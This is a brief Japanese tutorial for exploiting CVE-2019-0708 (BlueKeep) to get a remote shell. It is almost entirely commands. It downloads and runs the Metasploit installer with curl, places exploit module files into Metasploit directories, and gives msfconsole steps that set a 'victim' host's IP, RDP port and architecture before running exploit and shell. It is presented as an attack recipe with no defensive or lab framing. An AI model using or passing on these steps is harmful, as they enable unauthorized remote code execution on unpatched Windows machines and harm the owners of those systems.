
CVE-2019-0708 RCEリモートコード実行getshellチュートリアル
kali にインストール/更新 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
攻撃キットをダウンロードし、ファイルをmsfの該当フォルダに配置します(同名ファイルが既に存在する場合は直接上書きしてください)
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
利用手順:
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS を使用して被害機のIPを設定
set RPORT を使用して被害機のRDPポート番号を設定
set target ID番号(0〜4から選択可能)を使用して被害機のアーキテクチャを設定
set target=3
exploit
shell
